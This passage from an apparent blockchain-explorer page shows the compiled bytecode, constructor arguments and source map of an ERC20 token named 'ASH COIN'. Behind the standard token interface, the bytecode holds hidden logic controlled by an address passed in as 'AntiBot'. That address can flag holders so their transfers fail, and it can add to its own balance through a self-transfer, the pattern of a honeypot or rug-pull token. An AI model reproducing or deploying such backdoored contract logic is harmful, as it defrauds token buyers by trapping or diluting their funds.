f8565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156112735750600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561130e576112ca81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461132990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600081836113219190611ae6565b905092915050565b6000818361133791906116da565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561137957808201518184015260208101905061135e565b60008484015250505050565b6000601f19601f8301169050919050565b60006113a18261133f565b6113ab818561134a565b93506113bb81856020860161135b565b6113c481611385565b840191505092915050565b600060208201905081810360008301526113e98184611396565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611421826113f6565b9050919050565b61143181611416565b811461143c57600080fd5b50565b60008135905061144e81611428565b92915050565b6000819050919050565b61146781611454565b811461147257600080fd5b50565b6000813590506114848161145e565b92915050565b600080604083850312156114a1576114a06113f1565b5b60006114af8582860161143f565b92505060206114c085828601611475565b9150509250929050565b60008115159050919050565b6114df816114ca565b82525050565b60006020820190506114fa60008301846114d6565b92915050565b600060208284031215611516576115156113f1565b5b60006115248482850161143f565b91505092915050565b61153681611454565b82525050565b6000602082019050611551600083018461152d565b92915050565b6000806000606084860312156115705761156f6113f1565b5b600061157e8682870161143f565b935050602061158f8682870161143f565b92505060406115a086828701611475565b9150509250925092565b600060ff82169050919050565b6115c0816115aa565b82525050565b60006020820190506115db60008301846115b7565b92915050565b6115ea81611416565b82525050565b600060208201905061160560008301846115e1565b92915050565b60008060408385031215611622576116216113f1565b5b60006116308582860161143f565b92505060206116418582860161143f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061169257607f821691505b6020821081036116a5576116a461164b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006116e582611454565b91506116f083611454565b9250828201905080821115611708576117076116ab565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061176a60258361134a565b91506117758261170e565b604082019050919050565b600060208201905081810360008301526117998161175d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117fc60268361134a565b9150611807826117a0565b604082019050919050565b6000602082019050818103600083015261182b816117ef565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061188e60248361134a565b915061189982611832565b604082019050919050565b600060208201905081810360008301526118bd81611881565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061192060228361134a565b915061192b826118c4565b604082019050919050565b6000602082019050818103600083015261194f81611913565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061198c601d8361134a565b915061199782611956565b602082019050919050565b600060208201905081810360008301526119bb8161197f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611a1e60258361134a565b9150611a29826119c2565b604082019050919050565b60006020820190508181036000830152611a4d81611a11565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ab060238361134a565b9150611abb82611a54565b604082019050919050565b60006020820190508181036000830152611adf81611aa3565b9050919050565b6000611af182611454565b9150611afc83611454565b9250828203905081811115611b1457611b136116ab565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b7660268361134a565b9150611b8182611b1a565b604082019050919050565b60006020820190508181036000830152611ba581611b69565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be260208361134a565b9150611bed82611bac565b602082019050919050565b60006020820190508181036000830152611c1181611bd5565b905091905056fea26469706673582212207659d4c44cd48e2eb1603fb86b93323815cfa5eb708007acadea62b58e81128f64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000d4b9ec2fadfc97ca43ea8940f729b3955cb45a33000000000000000000000000000000000000000000000000000000000000000841534820434f494e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034153480000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102a8578063a9059cbb146102d8578063b1a4e0dc14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b8063715018a6146102465780638da5cb5b1461025057806395d89b411461026e57806396bfcd231461028c5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e657806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806312467afb1461015e57806318160ddd1461017a575b600080fd5b610118610384565b60405161012591906113cf565b60405180910390f35b6101486004803603810190610143919061148a565b610416565b60405161015591906114e5565b60405180910390f35b61017860048036038101906101739190611500565b610439565b005b610182610582565b60405161018f919061153c565b60405180910390f35b6101b260048036038101906101ad9190611557565b61058c565b6040516101bf91906114e5565b60405180910390f35b6101d06105bb565b6040516101dd91906115c6565b60405180910390f35b61020060048036038101906101fb919061148a565b6105c4565b60405161020d91906114e5565b60405180910390f35b610230600480360381019061022b9190611500565b6105fb565b60405161023d919061153c565b60405180910390f35b61024e610644565b005b610258610658565b60405161026591906115f0565b60405180910390f35b610276610681565b60405161028391906113cf565b60405180910390f35b6102a660048036038101906102a19190611500565b610713565b005b6102c260048036038101906102bd919061148a565b61085c565b6040516102cf91906114e5565b60405180910390f35b6102f260048036038101906102ed919061148a565b6108d3565b6040516102ff91906114e5565b60405180910390f35b610322600480360381019061031d9190611500565b610901565b60405161032f91906114e5565b60405180910390f35b610352600480360381019061034d919061160b565b6109bd565b60405161035f919061153c565b60405180910390f35b610382600480360381019061037d9190611500565b610a44565b005b6060600780546103939061167a565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf9061167a565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600080610421610ac7565b905061042e818585610acf565b600191505092915050565b610441610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036104ee576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b600654600260006104fd610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610541610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600654905090565b600080610597610ac7565b90506105a4858285610c98565b6105af858585610d24565b60019150509392505050565b60006012905090565b6000806105cf610ac7565b90506105f08185856105e185896109bd565b6105eb91906116da565b610acf565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61064c611087565b6106566000611105565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546106909061167a565b80601f01602080910402602001604051908101604052809291908181526020018280546106bc9061167a565b80156107095780601f106106de57610100808354040283529160200191610709565b820191906000526020600020905b8154815290600101906020018083116106ec57829003601f168201915b5050505050905090565b61071b610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036107c8576001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b600654600260006107d7610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061081b610ac7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b600080610867610ac7565b9050600061087582866109bd565b9050838110156108ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b190611780565b60405180910390fd5b6108c78286868403610acf565b60019250505092915050565b6000806108de610ac7565b90506108eb8185856111c9565b6108f6818585610d24565b600191505092915050565b600061090b610ac7565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036109b357600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1690506109b8565b600090505b919050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a4c611087565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610abb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab290611812565b60405180910390fd5b610ac481611105565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b35906118a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba490611936565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c8b919061153c565b60405180910390a3505050565b6000610ca484846109bd565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d1e5781811015610d10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d07906119a2565b60405180910390fd5b610d1d8484848403610acf565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8a90611a34565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df990611ac6565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060001515600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514610eee57600654600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610eeb9190611ae6565b90505b81811015610f31576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2890611b8c565b60405180910390fd5b610f44828261131390919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fd982600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461132990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611079919061153c565b60405180910390a350505050565b61108f610ac7565b73ffffffffffffffffffffffffffffffffffffffff166110ad610658565b73ffffffffffffffffffffffffffffffffffffffff1614611103576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fa90611bf8565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156112735750600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561130e576112ca81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461132990919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600081836113219190611ae6565b905092915050565b6000818361133791906116da565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561137957808201518184015260208101905061135e565b60008484015250505050565b6000601f19601f8301169050919050565b60006113a18261133f565b6113ab818561134a565b93506113bb81856020860161135b565b6113c481611385565b840191505092915050565b600060208201905081810360008301526113e98184611396565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611421826113f6565b9050919050565b61143181611416565b811461143c57600080fd5b50565b60008135905061144e81611428565b92915050565b6000819050919050565b61146781611454565b811461147257600080fd5b50565b6000813590506114848161145e565b92915050565b600080604083850312156114a1576114a06113f1565b5b60006114af8582860161143f565b92505060206114c085828601611475565b9150509250929050565b60008115159050919050565b6114df816114ca565b82525050565b60006020820190506114fa60008301846114d6565b92915050565b600060208284031215611516576115156113f1565b5b60006115248482850161143f565b91505092915050565b61153681611454565b82525050565b6000602082019050611551600083018461152d565b92915050565b6000806000606084860312156115705761156f6113f1565b5b600061157e8682870161143f565b935050602061158f8682870161143f565b92505060406115a086828701611475565b9150509250925092565b600060ff82169050919050565b6115c0816115aa565b82525050565b60006020820190506115db60008301846115b7565b92915050565b6115ea81611416565b82525050565b600060208201905061160560008301846115e1565b92915050565b60008060408385031215611622576116216113f1565b5b60006116308582860161143f565b92505060206116418582860161143f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061169257607f821691505b6020821081036116a5576116a461164b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006116e582611454565b91506116f083611454565b9250828201905080821115611708576117076116ab565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061176a60258361134a565b91506117758261170e565b604082019050919050565b600060208201905081810360008301526117998161175d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117fc60268361134a565b9150611807826117a0565b604082019050919050565b6000602082019050818103600083015261182b816117ef565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061188e60248361134a565b915061189982611832565b604082019050919050565b600060208201905081810360008301526118bd81611881565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061192060228361134a565b915061192b826118c4565b604082019050919050565b6000602082019050818103600083015261194f81611913565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061198c601d8361134a565b915061199782611956565b602082019050919050565b600060208201905081810360008301526119bb8161197f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611a1e60258361134a565b9150611a29826119c2565b604082019050919050565b60006020820190508181036000830152611a4d81611a11565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ab060238361134a565b9150611abb82611a54565b604082019050919050565b60006020820190508181036000830152611adf81611aa3565b9050919050565b6000611af182611454565b9150611afc83611454565b9250828203905081811115611b1457611b136116ab565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b7660268361134a565b9150611b8182611b1a565b604082019050919050565b60006020820190508181036000830152611ba581611b69565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be260208361134a565b9150611bed82611bac565b602082019050919050565b60006020820190508181036000830152611c1181611bd5565b905091905056fea26469706673582212207659d4c44cd48e2eb1603fb86b93323815cfa5eb708007acadea62b58e81128f64736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000d4b9ec2fadfc97ca43ea8940f729b3955cb45a33000000000000000000000000000000000000000000000000000000000000000841534820434f494e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034153480000000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): ASH COIN
Arg [1] : symbol_ (string): ASH
Arg [2] : AntiBot (address): 0xD4b9ec2faDFC97CA43eA8940f729B3955cB45A33
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000d4b9ec2fadfc97ca43ea8940f729b3955cb45a33
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [4] : 41534820434f494e000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [6] : 4153480000000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
9366:11281:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10516:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13099:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20024:219;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11616:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13872:287;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11466:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14568:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11781:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1981:103;;;:::i;:::-;;1331:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10729:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20251:208;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15309:424;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12108:230;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20467:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12636:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2239:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10516:94;10562:13;10595:7;10588:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10516:94;:::o;13099:193::-;13174:4;13191:13;13207:12;:10;:12::i;:::-;13191:28;;13230:32;13239:5;13246:7;13255:6;13230:8;:32::i;:::-;13280:4;13273:11;;;13099:193;;;;:::o;20024:219::-;20105:12;:10;:12::i;:::-;20093:24;;:8;;;;;;;;;;;:24;;;20089:80;;20152:5;20133:8;:16;20142:6;20133:16;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;20089:80;20221:14;;20179:11;:25;20191:12;:10;:12::i;:::-;20179:25;;;;;;;;;;;;;;;:39;20205:12;:10;:12::i;:::-;20179:39;;;;;;;;;;;;;;;:56;;;;20024:219;:::o;11616:102::-;11669:7;11696:14;;11689:21;;11616:102;:::o;13872:287::-;13995:4;14012:15;14030:12;:10;:12::i;:::-;14012:30;;14053:38;14069:4;14075:7;14084:6;14053:15;:38::i;:::-;14102:27;14112:4;14118:2;14122:6;14102:9;:27::i;:::-;14147:4;14140:11;;;13872:287;;;;;:::o;11466:85::-;11516:5;11541:2;11534:9;;11466:85;:::o;14568:238::-;14656:4;14673:13;14689:12;:10;:12::i;:::-;14673:28;;14712:64;14721:5;14728:7;14765:10;14737:25;14747:5;14754:7;14737:9;:25::i;:::-;:38;;;;:::i;:::-;14712:8;:64::i;:::-;14794:4;14787:11;;;14568:238;;;;:::o;11781:119::-;11847:7;11874:9;:18;11884:7;11874:18;;;;;;;;;;;;;;;;11867:25;;11781:119;;;:::o;1981:103::-;1215:15;:13;:15::i;:::-;2046:30:::1;2073:1;2046:18;:30::i;:::-;1981:103::o:0;1331:87::-;1377:7;1404:6;;;;;;;;;;;1397:13;;1331:87;:::o;10729:98::-;10777:13;10810:9;10803:16;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10729:98;:::o;20251:208::-;20322:12;:10;:12::i;:::-;20310:24;;:8;;;;;;;;;;;:24;;;20306:79;;20369:4;20350:8;:16;20359:6;20350:16;;;;;;;;;;;;;;;;:23;;;;;;;;;;;;;;;;;;20306:79;20437:14;;20395:11;:25;20407:12;:10;:12::i;:::-;20395:25;;;;;;;;;;;;;;;:39;20421:12;:10;:12::i;:::-;20395:39;;;;;;;;;;;;;;;:56;;;;20251:208;:::o;15309:424::-;15402:4;15419:13;15435:12;:10;:12::i;:::-;15419:28;;15458:24;15485:25;15495:5;15502:7;15485:9;:25::i;:::-;15458:52;;15549:15;15529:16;:35;;15521:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;15634:60;15643:5;15650:7;15678:15;15659:16;:34;15634:8;:60::i;:::-;15721:4;15714:11;;;;15309:424;;;;:::o;12108:230::-;12179:4;12196:13;12212:12;:10;:12::i;:::-;12196:28;;12235:34;12251:5;12258:2;12262:6;12235:15;:34::i;:::-;12280:28;12290:5;12297:2;12301:6;12280:9;:28::i;:::-;12326:4;12319:11;;;12108:230;;;;:::o;20467:175::-;20518:4;20552:12;:10;:12::i;:::-;20540:24;;:8;;;;;;;;;;;:24;;;20536:76;;20587:8;:13;20596:3;20587:13;;;;;;;;;;;;;;;;;;;;;;;;;20580:20;;;;20536:76;20629:5;20622:12;;20467:175;;;;:::o;12636:143::-;12717:7;12744:11;:18;12756:5;12744:18;;;;;;;;;;;;;;;:27;12763:7;12744:27;;;;;;;;;;;;;;;;12737:34;;12636:143;;;;:::o;2239:201::-;1215:15;:13;:15::i;:::-;2348:1:::1;2328:22;;:8;:22;;::::0;2320:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2404:28;2423:8;2404:18;:28::i;:::-;2239:201:::0;:::o;130:98::-;183:7;210:10;203:17;;130:98;:::o;18904:380::-;19057:1;19040:19;;:5;:19;;;19032:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19138:1;19119:21;;:7;:21;;;19111:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19222:6;19192:11;:18;19204:5;19192:18;;;;;;;;;;;;;;;:27;19211:7;19192:27;;;;;;;;;;;;;;;:36;;;;19260:7;19244:32;;19253:5;19244:32;;;19269:6;19244:32;;;;;;:::i;:::-;;;;;;;;18904:380;;;:::o;19575:441::-;19710:24;19737:25;19747:5;19754:7;19737:9;:25::i;:::-;19710:52;;19797:17;19777:16;:37;19773:236;;19859:6;19839:16;:26;;19831:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19935:51;19944:5;19951:7;19979:6;19960:16;:25;19935:8;:51::i;:::-;19773:236;19699:317;19575:441;;;:::o;16205:693::-;16364:1;16342:24;;:10;:24;;;16334:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;16441:1;16427:16;;:2;:16;;;16419:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;16494:15;16511:9;:21;16521:10;16511:21;;;;;;;;;;;;;;;;16494:38;;16573:5;16549:29;;:8;:20;16558:10;16549:20;;;;;;;;;;;;;;;;;;;;;;;;;:29;;;16545:110;;16628:14;;16605:9;:21;16615:10;16605:21;;;;;;;;;;;;;;;;:38;;;;:::i;:::-;16595:48;;16545:110;16686:6;16675:7;:17;;16667:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16770:19;16782:6;16770:7;:11;;:19;;;;:::i;:::-;16746:9;:21;16756:10;16746:21;;;;;;;;;;;;;;;:43;;;;16817:25;16835:6;16817:9;:13;16827:2;16817:13;;;;;;;;;;;;;;;;:17;;:25;;;;:::i;:::-;16800:9;:13;16810:2;16800:13;;;;;;;;;;;;;;;:42;;;;16879:2;16858:32;;16867:10;16858:32;;;16883:6;16858:32;;;;;;:::i;:::-;;;;;;;;16323:575;16205:693;;;:::o;1496:134::-;1573:12;:10;:12::i;:::-;1562:23;;:7;:5;:7::i;:::-;:23;;;1554:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1496:134::o;2600:191::-;2674:16;2693:6;;;;;;;;;;;2674:25;;2719:8;2710:6;;:17;;;;;;;;;;;;;;;;;;2774:8;2743:40;;2764:8;2743:40;;;;;;;;;;;;2663:128;2600:191;:::o;12346:227::-;12455:8;;;;;;;;;;;12445:18;;:6;:18;;;:43;;;;;12480:8;;;;;;;;;;;12467:21;;:9;:21;;;12445:43;12441:125;;;12525:29;12547:6;12525:9;:17;12535:6;12525:17;;;;;;;;;;;;;;;;:21;;:29;;;;:::i;:::-;12505:9;:17;12515:6;12505:17;;;;;;;;;;;;;;;:49;;;;12441:125;12346:227;;;:::o;5630:98::-;5688:7;5719:1;5715;:5;;;;:::i;:::-;5708:12;;5630:98;;;;:::o;5249:::-;5307:7;5338:1;5334;:5;;;;:::i;:::-;5327:12;;5249:98;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o